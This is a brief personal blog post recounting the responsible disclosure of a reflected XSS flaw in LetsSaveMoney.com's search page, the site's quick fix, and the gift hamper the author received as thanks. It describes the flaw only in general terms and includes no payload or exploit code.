Responsible Disclosure - XSS Flaw at LetsSaveMoney.com


Another day, another bug!

LetsSaveMoney.com is a "money saving" site. It offers discounts on a wide range of products and services, and is financed through affiliate marketing.

My Trade Union, Prospect, has just launched a white-labelled "Members' Rewards" based on LetsSaveMoney - that's how I came across this bug.

It's a depressingly familiar story - do a search which includes some HTML and watch it being echoed back to the user.

Lets Save Money XSS

Once you can get a page to load an external resource, it's game over for security. An attacker can load up JavaScript, prompt the user for their password, display unauthorised images, etc.

I posted a report on XSSposed and alerted LetsSaveMoney via their "Contact Us" form.

Impressively, I received an email back a few minutes later. I provided the details over email and the site was fixed an hour later!

That's an excellent response time.

If you run a website, familiarise yourself with OWASP's Top 10 Web Vulnerabilities. If you're a worker in a high-tech industry, you should consider joining Prospect as your Trade Union.

Bounty

While I neither asked for, nor expected, a reward - I was delighted to receive an Xmas gift hamper as a token of their appreciation.
Bug Bounty Hamper
Hurrah!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.